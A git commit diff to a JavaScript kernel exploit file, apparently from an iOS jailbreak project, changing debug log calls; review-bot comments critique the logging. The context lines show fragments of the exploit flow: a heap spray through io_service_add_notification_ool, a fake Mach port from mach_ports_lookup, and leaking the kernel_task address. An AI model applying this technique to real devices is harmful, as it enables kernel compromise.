| author | spv420 <spv@spv.sh> | 2022-07-31 03:40:20 -0400 |
|---|---|---|
| committer | spv420 <spv@spv.sh> | 2022-07-31 03:40:20 -0400 |
| commit | eb21089efd298dfec49ebd2836105f5d900d50ae (patch) | |
| tree | 3d4bd358218bcd42300e0e37891e49b3a5e8fbc9 | |
| parent | 5e2fcfa6ed69699d13b766b79f4959a1aff8c858 (diff) | |
fuck
| -rwxr-xr-x | src/stage4/kexp/exploit.js | 10 |
1 files changed, 5 insertions, 5 deletions
diff --git a/src/stage4/kexp/exploit.js b/src/stage4/kexp/exploit.js
index 04b7c34..aa10126 100755
--- a/src/stage4/kexp/exploit.js
+++ b/src/stage4/kexp/exploit.js
@@ -187,7 +187,7 @@ function spray(dict, size, port) {
 ret = host_get_io_master(mach_host_self(), master);
 // p0laris_log("yahtzee3 %d (%s) %p\n", ret, mach_error_string(ret), read_u32(master));
-// scall("p0laris_log", "0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x\n", master, 0x41414141, "IOServiceTerminate", 0x41414141, dict, 0x41414141, size, 0x41414141, MACH_PORT_NULL, 0x41414141, NULL, 0x41414141, 0, 0x41414141, err, 0x41414141, port, 0x41414141);
+// p0laris_log("0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x\n", master, 0x41414141, "IOServiceTerminate", 0x41414141, dict, 0x41414141, size, 0x41414141, MACH_PORT_NULL, 0x41414141, NULL, 0x41414141, 0, 0x41414141, err, 0x41414141, port, 0x41414141);
 ret = io_service_add_notification_ool(read_u32(master), "IOServiceTerminate", dict, size, MACH_PORT_NULL, NULL, 0, err, port);
 // p0laris_log("yahtzee %d (%s)\n", ret, mach_error_string(ret));
@@ -368,7 +368,7 @@ function mach_ports_lookup_shit() {
 calls4arg("mach_ports_lookup", task_self, arrz, sz, 0);
 puts("helo");
 p0laris_log("mpl success\n");
- scall("p0laris_log", "done %x %x %x %x\n", read_u32(read_u32(arrz) + 0), read_u32(read_u32(arrz) + 4), read_u32(read_u32(arrz) + 8), read_u32(kp));
+ p0laris_log("done %x %x %x %x\n", read_u32(read_u32(arrz) + 0), read_u32(read_u32(arrz) + 4), read_u32(read_u32(arrz) + 8), read_u32(kp));
 p0laris_log("mpl success\n");
 return read_u32(read_u32(arrz) + 8);
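Review bot: The only line the hunk at line 187 touches in spray() is a commented-out debug print, so the edit keeps dead code in step with the live call sites instead of removing it. If the argument dump for `io_service_add_notification_ool` is no longer needed, delete the `// p0laris_log("0x%08x ...` line along with the neighbouring commented `yahtzee` prints; if it is still needed, a short comment such as `// debug: dump arguments passed to io_service_add_notification_ool` above it would say why it is kept. The body of spray() starts and ends outside the hunk.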
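Review bot: In the hunk at line 368, `p0laris_log("mpl success\n")` is emitted both before and after the rewritten `done %x %x %x %x` line, with `puts("helo")` just above, so one pass through mach_ports_lookup_shit() writes three progress markers that say the same thing. Keep one marker and document the dump, for example `// words at offsets 0, 4 and 8 of the buffer arrz points to, then the word at kp`. The result of `calls4arg("mach_ports_lookup", ...)` is not examined in the visible lines, so the word "success" in the log is not backed by a check here. The same `done ...` format string is repeated in the hunk at line 479, and the function starts and ends outside this hunk.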
@@ -479,7 +479,7 @@ again: while (true) {
 // mach_ports_lookup_shit_dealloc();
 var ret__ = r3gister(mach_task_self(), arrz, 2, 3);
 mach_ports_lookup(mach_task_self(), arrz, sz);
- scall("p0laris_log", "done %x %x %x %x\n", read_u32(read_u32(arrz) + 0), read_u32(read_u32(arrz) + 4), read_u32(read_u32(arrz) + 8), read_u32(kp));
+ p0laris_log("done %x %x %x %x\n", read_u32(read_u32(arrz) + 0), read_u32(read_u32(arrz) + 4), read_u32(read_u32(arrz) + 8), read_u32(kp));
 p0laris_log("mpl success\n");
 var fake_port = read_u32(read_u32(arrz) + 8);
@@ -537,7 +537,7 @@ again: while (true) {
 p0laris_log("fuck\n");
 var kernel_task_addr = shit_heap(4);
 p0laris_log("fuck\n");
- scall("p0laris_log", "kernel_task address: 0x%08x\n", read_u32(kernel_task_addr));
+ p0laris_log("kernel_task address: 0x%08x\n", read_u32(kernel_task_addr));
 ret__ = pid_for_task(fake_port, kernel_task_addr);
 p0laris_log("%d %s\n", ret__, mach_error_string(ret__));
 p0laris_log("fuck\n");
@@ -547,7 +547,7 @@ again: while (true) {
 if (kernel_task_addr === 0xffffffff) {
 continue again;
 }
- scall("p0laris_log", "kernel_task address: 0x%08x\n", read_u32(kernel_task_addr));
+ p0laris_log("kernel_task address: 0x%08x\n", read_u32(kernel_task_addr));
 p0laris_log("fuck\n");
 p0laris_log("get lucky\n"); |
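Review bot: In the hunk at line 537 the `kernel_task address: 0x%08x\n` line is logged before `pid_for_task(fake_port, kernel_task_addr)` runs, so it reports whatever the buffer from `shit_heap(4)` holds at that moment (presumably a fresh allocation) under a label that claims a result. The identical string is logged again in the hunk at line 547, and both sites sit between identical `fuck\n` markers, so a log reader cannot tell which site produced a given line. Give each site its own label, e.g. `p0laris_log("kernel_task buf before pid_for_task: 0x%08x\n", read_u32(kernel_task_addr));` for the first, and replace the placeholder markers with text that names the step. The `again:` loop body starts and ends outside both hunks.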
